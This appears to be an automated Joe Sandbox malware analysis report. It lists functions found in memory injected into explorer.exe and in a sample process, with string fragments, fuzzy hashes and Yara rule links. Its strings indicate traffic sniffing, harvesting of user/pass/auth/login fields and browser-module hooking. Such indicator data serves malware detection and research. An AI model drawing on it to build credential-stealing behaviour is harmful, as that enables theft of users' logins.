shel, xrefs: 0FAB4C90
2.dl, xrefs: 0FAB4C64
l32., xrefs: 0FAB4C97
dll, xrefs: 0FAB4C9E

Memory Dump Source

Source File: 00000007.00000002.2887169345.000000000F9D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F9D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f9d0000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: d7b9c191aeee7e7e921f775bbbdb3417c524d27f15f78be42083621cfe0fe22d
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: 6D517EB0918B4C8FDB64EFA4C044AEEB7F1FF18300F40462E959AE7215EF3495408B89

Uniqueness

Uniqueness Score: -1.00%

Function 0F912C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

ole3, xrefs: 0F912C5D
dll, xrefs: 0F912C9E
shel, xrefs: 0F912C90
l32., xrefs: 0F912C97
2.dl, xrefs: 0F912C64

Memory Dump Source

Source File: 00000007.00000002.2886880158.000000000F8A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f8a0000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: 7127526ece2ce45a1a078be61e532c43892f6ab24a0da5849a0303516b637378
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: 6D515EB0918B4C8FDB65EFA4C044AEEB7F1FF58300F40462E999AE7255EF3095458B89

Uniqueness

Uniqueness Score: -1.00%

Function 0FAB586F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

vers, xrefs: 0FAB58E4
ion., xrefs: 0FAB58EC
4, xrefs: 0FAB59E9
\, xrefs: 0FAB59E0
dll, xrefs: 0FAB58F4

Memory Dump Source

Source File: 00000007.00000002.2887169345.000000000F9D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F9D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f9d0000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: f4981027b9cbe0017d1b5bbd6082b183ef4e90925474f08813673aa27d0201e6
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: 73416F30628B498FCBB5EF6498457EAB3E4FF99301F44462E985EC7246EF34E5058782

Uniqueness

Uniqueness Score: -1.00%

Function 0F91386F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

vers, xrefs: 0F9138E4
dll, xrefs: 0F9138F4
4, xrefs: 0F9139E9
ion., xrefs: 0F9138EC
\, xrefs: 0F9139E0

Memory Dump Source

Source File: 00000007.00000002.2886880158.000000000F8A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f8a0000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: a5178474c8f8dbfd1e715f73654c5a1b8191ada77862eb35655ab8200e13513f
Instruction ID: a673b7358210c4c63fe5bcc4b77fdb356df4bb0b2acbcce26c6a5915515adde5
Opcode Fuzzy Hash: a5178474c8f8dbfd1e715f73654c5a1b8191ada77862eb35655ab8200e13513f
Instruction Fuzzy Hash: 76414F30618B4C8BCBA5EF249845BEA77E4FBD8301F40462E994EC7282EF30E545C782

Uniqueness

Uniqueness Score: -1.00%

Function 0FAB74B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

cli., xrefs: 0FAB7515
dll, xrefs: 0FAB751C
32.d, xrefs: 0FAB74DA
user, xrefs: 0FAB74D3
sspi, xrefs: 0FAB750E

Memory Dump Source

Source File: 00000007.00000002.2887169345.000000000F9D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F9D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f9d0000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: 312d66e3eb3b8d969eb48aa2a218c604342cbfaea15b01abfb720fc8a746c424
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: 6A415D70A18F0D8FCB54EF6880957ED77E9FB98301F50466EA80ED7212DA78D5408BC6

Uniqueness

Uniqueness Score: -1.00%

Function 0F9154B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

sspi, xrefs: 0F91550E
user, xrefs: 0F9154D3
dll, xrefs: 0F91551C
32.d, xrefs: 0F9154DA
cli., xrefs: 0F915515

Memory Dump Source

Source File: 00000007.00000002.2886880158.000000000F8A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f8a0000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: 0f7963d5d533ca531914de400986f91a99dd79bcd4a83447b4aaa0678f462056
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: E8418034A18F0D8FCB58EF6880943AD73E6FB98300F46457AA80ED7292DB31D5408BC6

Uniqueness

Uniqueness Score: -1.00%

Function 0FAB5432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

kern, xrefs: 0FAB552A
.dll, xrefs: 0FAB553F
el32, xrefs: 0FAB5537
h, xrefs: 0FAB551F

Memory Dump Source

Source File: 00000007.00000002.2887169345.000000000F9D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F9D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f9d0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: bab9e0efa92d47d244065e8fb20396727d3babc838e8c88b05065ddabeeb1f00
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: F1419370A08B488FD768DF2884883AAB7E6FB98301F54472E949EC7256DB74D445CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0F913432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

.dll, xrefs: 0F91353F
h, xrefs: 0F91351F
el32, xrefs: 0F913537
kern, xrefs: 0F91352A

Memory Dump Source

Source File: 00000007.00000002.2886880158.000000000F8A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f8a0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: eec459aae764a687b6764c44ea37ca8d663120ffcad9dcdae4f64b1fdd69cdc9
Instruction ID: 5b619b30caebe1ba474b1a373e2fe7a3db122aa2cd86a1977d7558db7e0ea57d
Opcode Fuzzy Hash: eec459aae764a687b6764c44ea37ca8d663120ffcad9dcdae4f64b1fdd69cdc9
Instruction Fuzzy Hash: D2416D70608B4C8FD769DF2880847AABBE1FBE8300F504A7E949EC3296DB70D545CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0FABC0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

, xrefs: 0FABC184
om:, xrefs: 0FABC146
f fr, xrefs: 0FABC13D
Snif, xrefs: 0FABC154

Memory Dump Source

Source File: 00000007.00000002.2887169345.000000000F9D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F9D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f9d0000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 62fd3e705946e6bd9e97560e332af770dad87ca4439e05f5ab6826fec42ad69f
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: 8831F67150CB889FD71AEB28D4846EAB7D4FB94300F50491EE49BD7253EE38A549CB83

Uniqueness

Uniqueness Score: -1.00%

Function 0F91A0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

Snif, xrefs: 0F91A154
om:, xrefs: 0F91A146
f fr, xrefs: 0F91A13D
, xrefs: 0F91A184

Memory Dump Source

Source File: 00000007.00000002.2886880158.000000000F8A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f8a0000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 25b05cae670311db5b6468f33835bca903070109347495925eacefbf71f075d0
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: BA319271519B8C5FD71AEB28C4846DAB7D4FB94300F90492EE49BC7292EA34A549CA42

Uniqueness

Uniqueness Score: -1.00%

Function 0FABC0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

, xrefs: 0FABC184
om:, xrefs: 0FABC146
f fr, xrefs: 0FABC13D
Snif, xrefs: 0FABC154

Memory Dump Source

Source File: 00000007.00000002.2887169345.000000000F9D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F9D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f9d0000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: 1d10726fc908519b101d40b0c3998155d86c0a5c985de62d67c0a01b62fe2cfc
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: 3431D471508B486FD71AEB28C484AEAB7D4FB94300F50491EE49BD7253EE38E506CA83

Uniqueness

Uniqueness Score: -1.00%

Function 0F91A0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

Snif, xrefs: 0F91A154
om:, xrefs: 0F91A146
f fr, xrefs: 0F91A13D
, xrefs: 0F91A184

Memory Dump Source

Source File: 00000007.00000002.2886880158.000000000F8A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f8a0000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: a4fb20d13c2588045256c70b3c5d7b45978ba6d06f139b3b243068bddf35f290
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: D831A471518B4C6FD729EB24C4846EAB7D4FBD4300F50492EE49BC7293EE34A549CA42

Uniqueness

Uniqueness Score: -1.00%

Function 0FAB7FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

chro, xrefs: 0FAB8023
.dll, xrefs: 0FAB7FFE
hild, xrefs: 0FAB7FF6
me_c, xrefs: 0FAB7FEE

Memory Dump Source

Source File: 00000007.00000002.2887169345.000000000F9D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F9D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f9d0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: ccda10e5cc5bf0a23113cb1590d0d3df1d174595cbce2c0a8f527591cd779bb2
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: 24318030218B484FCB94EF688594BAAB7E5FF98300F94466DA44ECB257DF38D505C792

Uniqueness

Uniqueness Score: -1.00%

Function 0F915FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

me_c, xrefs: 0F915FEE
chro, xrefs: 0F916023
.dll, xrefs: 0F915FFE
hild, xrefs: 0F915FF6

Memory Dump Source

Source File: 00000007.00000002.2886880158.000000000F8A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f8a0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: 1378036678c61b1e849ad0bd78bdbe114a7d8b3bb2aef5e0b022cab0dcc9963f
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: FA317E70618B0C4FC785EF289494BAAB7E1FBD8300F84467D984ACB296DF34D945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0FAB7FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

chro, xrefs: 0FAB8023
.dll, xrefs: 0FAB7FFE
hild, xrefs: 0FAB7FF6
me_c, xrefs: 0FAB7FEE

Memory Dump Source

Source File: 00000007.00000002.2887169345.000000000F9D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F9D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f9d0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: da37146ae454bce6c631796bd6465f42387d74641361f7e1ce81e77c0df6d01c
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: 4B317E70218B488FCB94EF688494BAAB7E5FF98300F94466DA44ECB257DF38D505C792

Uniqueness

Uniqueness Score: -1.00%

Function 0F915FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

me_c, xrefs: 0F915FEE
chro, xrefs: 0F916023
.dll, xrefs: 0F915FFE
hild, xrefs: 0F915FF6

Memory Dump Source

Source File: 00000007.00000002.2886880158.000000000F8A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f8a0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: c38b4e575c0671ae4b54c0b0546e3d9f138905a4273eae882e453de1934d8e0e
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: 59317C70218B0C4FC785EF289494BAAB7E1FBD8300F84467D984ACB296DF34D905CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0FABA8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

User-Agent: , xrefs: 0FABA935, 0FABA948
urlmon.dll, xrefs: 0FABA959
on.d, xrefs: 0FABA902
nt: , xrefs: 0FABA91E

Memory Dump Source

Source File: 00000007.00000002.2887169345.000000000F9D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F9D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f9d0000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: ac0a75494213425cdf8f22c624c80d97a40613504afe7d4f6b12c1eb30327cf0
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 2D31CC31A14B4D8BCB05EFA8C8847EEBBE4FB58205F40422ED84ED7242DE7C96458789

Uniqueness

Uniqueness Score: -1.00%

Function 0F9188C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

nt: , xrefs: 0F91891E
on.d, xrefs: 0F918902
urlmon.dll, xrefs: 0F918959
User-Agent: , xrefs: 0F918935, 0F918948

Memory Dump Source

Source File: 00000007.00000002.2886880158.000000000F8A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f8a0000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 195a6a81abcc7df7b4e11f988ad9f22865631d28a7f2d972afc753b12928074b
Instruction ID: 769478f7f6c1bce23c07e0d1d1d7cf0fa6caaed8136dd4ca78363429beeb2a3c
Opcode Fuzzy Hash: 195a6a81abcc7df7b4e11f988ad9f22865631d28a7f2d972afc753b12928074b
Instruction Fuzzy Hash: 3931D131614B0C8BCB14EFA8C8847EDB7E5FB98315F40022AD44ED7282DF789645CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0FABA8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

User-Agent: , xrefs: 0FABA935, 0FABA948
urlmon.dll, xrefs: 0FABA959
on.d, xrefs: 0FABA902
nt: , xrefs: 0FABA91E

Memory Dump Source

Source File: 00000007.00000002.2887169345.000000000F9D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F9D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f9d0000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 633e4ae76154d9632bb1568e0ccdc8401f467b18a308b283258e48ea9da2d0e9
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 8921E130A10B4D8ACB05EFA8C8847EDBBE4FF58204F41422ED45AD7242DE7C960487C9

Uniqueness

Uniqueness Score: -1.00%

Function 0F9188BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

nt: , xrefs: 0F91891E
on.d, xrefs: 0F918902
urlmon.dll, xrefs: 0F918959
User-Agent: , xrefs: 0F918935, 0F918948

Memory Dump Source

Source File: 00000007.00000002.2886880158.000000000F8A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f8a0000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 0a5ee71b9761113bd156a099350638331f5b22ed2827212038b15dd7583850ac
Instruction ID: 20072dcc07932e6d75299ce9d0660d20360e31a5b0b0b8dd1850d0600f165460
Opcode Fuzzy Hash: 0a5ee71b9761113bd156a099350638331f5b22ed2827212038b15dd7583850ac
Instruction Fuzzy Hash: 3721E671610B0C8BCB15EFA8C8847ED7BE5FF98305F40422AD45AD7282DF789605CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0FABBE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0FABBF03
., xrefs: 0FABBF1F
l, xrefs: 0FABBF26
t, xrefs: 0FABBEF4

Memory Dump Source

Source File: 00000007.00000002.2887169345.000000000F9D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F9D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f9d0000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: 1cc8a5a7b1da6887e41f548752af3c7dd0b16e59509e4055aaa9b53ca57c2856
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: E6214874A24B0E9FDB48EFA8D044BEABAF1FF58314F50462ED109D3612DB7895918B84

Uniqueness

Uniqueness Score: -1.00%

Function 0FABBE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0FABBF03
., xrefs: 0FABBF1F
l, xrefs: 0FABBF26
t, xrefs: 0FABBEF4

Memory Dump Source

Source File: 00000007.00000002.2887169345.000000000F9D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F9D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f9d0000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: 0c84caf012f25d2a9446f4696229c7c1bc6f658df0406a0bc65b583dcf471d56
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: 68215A74A24B0E9BDB08EFA8D444BE9BBF1FF58314F50462ED109D3602DB7895918BC4

Uniqueness

Uniqueness Score: -1.00%

Function 0F919E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0F919F26
., xrefs: 0F919F1F
l, xrefs: 0F919F03
t, xrefs: 0F919EF4

Memory Dump Source

Source File: 00000007.00000002.2886880158.000000000F8A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f8a0000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: f8bf92aca92e02439aa0b1f358925c194d12b3b179899dcbae52679bdff49a5f
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 89217A74A24B0D9FDB48EFA8D0447AEBAF0FB98304F50462ED009D3652DB789595CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0F919E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0F919F26
., xrefs: 0F919F1F
l, xrefs: 0F919F03
t, xrefs: 0F919EF4

Memory Dump Source

Source File: 00000007.00000002.2886880158.000000000F8A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f8a0000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: dcdf5ba4912985ad34a32382a062d25d79ca17fc1879c9d96346700562da2cd1
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: A2218B74A24B0D9BDB48EFA8D0447EEBBF0FB58304F50462ED009D3642DB789555CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0FABBFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

pass, xrefs: 0FABC022
user, xrefs: 0FABC015
auth, xrefs: 0FABC02F
logi, xrefs: 0FABC03C

Memory Dump Source

Source File: 00000007.00000002.2887169345.000000000F9D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F9D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f9d0000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: 69eb161ca6edb4ab120db2ebecc12d0cec38a0b82346055955fab7cc2728cdbe
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: 7021AE70614B0D8BCB05DF9998806EEB7F1EF88354F00462D940ADB246D7B8E9148BC6

Uniqueness

Uniqueness Score: -1.00%

Function 0F919FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

pass, xrefs: 0F91A022
user, xrefs: 0F91A015
logi, xrefs: 0F91A03C
auth, xrefs: 0F91A02F

Memory Dump Source

Source File: 00000007.00000002.2886880158.000000000F8A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f8a0000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: 064da5203b600a25260accae0620535b0a607be3867f1ee2905593c27b0a2201
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: 7E21C030614B0D8BCB05DF9998806EEB7E1FFC8354F044629D40ADB286D7B4E9148BC2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: tsnokiirph.exePID: 7108, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	15.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	258
Total number of Limit Nodes:	14

Executed Functions

Function 05975DC8 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 05975E56
GetCurrentThread.KERNEL32 ref: 05975E93
GetCurrentProcess.KERNEL32 ref: 05975ED0
GetCurrentThreadId.KERNEL32 ref: 05975F29

Memory Dump Source

Source File: 00000008.00000002.1704545102.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5970000_tsnokiirph.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: ecb854aa407fa712da90b7a37b7ba1aa646b0c6979c2fdd5d4b64bab75569359
Instruction ID: e05244a5a0a2c71abc986e96595c12f0930c13cdf34c6c7420a04e891a29a838
Opcode Fuzzy Hash: ecb854aa407fa712da90b7a37b7ba1aa646b0c6979c2fdd5d4b64bab75569359
Instruction Fuzzy Hash: AF5145B09003099FDB54DFAAD948BAEBBF5BF48314F208459E419A7360DB349984CF65

Uniqueness

Uniqueness Score: -1.00%

Function 05975DD8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 05975E56
GetCurrentThread.KERNEL32 ref: 05975E93
GetCurrentProcess.KERNEL32 ref: 05975ED0
GetCurrentThreadId.KERNEL32 ref: 05975F29

Memory Dump Source

Source File: 00000008.00000002.1704545102.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5970000_tsnokiirph.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 6583088b4fbc29d62c2d688b9cb4e23d9e757f900f6ebd5ca5516043cb573434
Instruction ID: 3fecfe562fe2f4782a645f042da79d11f608dd678fd8a90954baaabc3ca6a304
Opcode Fuzzy Hash: 6583088b4fbc29d62c2d688b9cb4e23d9e757f900f6ebd5ca5516043cb573434
Instruction Fuzzy Hash: 575154B09003098FDB54DFAAD548BAEBBF5BF88314F208459E419A7360DB74A984CF65

Uniqueness

Uniqueness Score: -1.00%

Function 09C8AFB4 Relevance: 1.8, APIs: 1, Instructions: 325
processCOMMON

Download Yara Rule

